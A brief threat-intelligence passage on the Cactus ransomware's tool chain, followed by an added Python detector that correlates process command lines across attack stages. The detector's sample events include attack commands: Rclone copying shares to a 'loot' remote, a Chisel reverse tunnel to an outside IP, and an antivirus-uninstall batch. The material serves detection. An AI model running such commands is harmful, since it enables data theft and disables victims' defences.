The Cactus ransomware relies on multiple legitimate tools (e.g. Splashtop, AnyDesk, SuperOps RMM) to achieve remote access, and uses Cobalt Strike and the proxy tool Chisel in post-exploitation activities.

Once the malware has escalated privileges on a machine, the threat actors use a batch script to uninstall popular antivirus solutions installed on the machine.

Cactus uses the Rclone tool for data exfiltration and a PowerShell script called TotalExec, which was used in the past by BlackBasta ransomware operators, to automate the deployment of the encryption process.
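The tool chain described above lends itself to a host-level correlation check. The following is an added example, not code from the article or from Kroll: it scans constructed, simplified process-creation records for the tools named here (netscan, PSnmap, AnyDesk, Splashtop, SuperOps, Chisel, Rclone, TotalExec.ps1 and an antivirus-uninstall batch script) and flags a host only when several distinct phases appear on it, because any one of these legitimate tools on its own is routine in normal administration. The host names, command lines and regexes are my own assumptions.

```python
import re
from collections import defaultdict

# Tool names come from the article's description of Cactus; the regexes, stage
# labels and sample records below are my own (constructed, not real telemetry).
STAGE_PATTERNS = {
    "discovery":       re.compile(r"\b(netscan(?:64)?\.exe|psnmap)\b", re.I),
    "remote_access":   re.compile(r"\b(anydesk|splashtop|superops)\b", re.I),
    "tunneling":       re.compile(r"\bchisel(?:\.exe)?\b.*\b(client|server)\b", re.I),
    "defense_evasion": re.compile(r"\.bat\b.*\buninst|\buninst.*\.bat\b", re.I),
    "exfiltration":    re.compile(r"\brclone(?:\.exe)?\b.*\b(copy|sync|move)\b", re.I),
    "encryption_prep": re.compile(r"\btotalexec\.ps1\b", re.I),
}

# Constructed process-creation records: FS01 shows the full chain, WS22 only a
# helpdesk remote-access tool, which on its own must not raise an alert.
SAMPLE_EVENTS = [
    {"host": "FS01", "cmdline": r"C:\Temp\netscan.exe /hide /range:10.10.0.1-10.10.0.254"},
    {"host": "FS01", "cmdline": r"C:\ProgramData\AnyDesk\AnyDesk.exe --service"},
    {"host": "FS01", "cmdline": r"C:\Temp\chisel.exe client 203.0.113.10:8080 R:socks"},
    {"host": "FS01", "cmdline": r"cmd.exe /c C:\Temp\uninstall_av.bat"},
    {"host": "FS01", "cmdline": r"C:\Temp\rclone.exe copy D:\Shares remote:loot --transfers 32"},
    {"host": "FS01", "cmdline": r"powershell.exe -ep bypass -File C:\Temp\TotalExec.ps1"},
    {"host": "WS22", "cmdline": r"C:\Program Files\Splashtop\Splashtop Remote\Client\SRClient.exe"},
    {"host": "WS22", "cmdline": r"C:\Windows\System32\notepad.exe C:\Users\jdoe\notes.txt"},
]


def classify(cmdline):
    """Return the set of stage labels whose pattern matches this command line."""
    return {stage for stage, rx in STAGE_PATTERNS.items() if rx.search(cmdline)}


def correlate(events, min_stages=2):
    """Collect stages per host and report hosts with at least min_stages distinct
    stages, so a lone legitimate RMM tool does not fire by itself."""
    stages_by_host = defaultdict(set)
    for ev in events:
        stages_by_host[ev["host"]] |= classify(ev["cmdline"])
    return {h: sorted(s) for h, s in stages_by_host.items() if len(s) >= min_stages}


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```

In practice the records would come from Sysmon or EDR process-creation telemetry, and the threshold and patterns would be tuned against the organisation's own administrative tooling.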
Pierluigi Paganini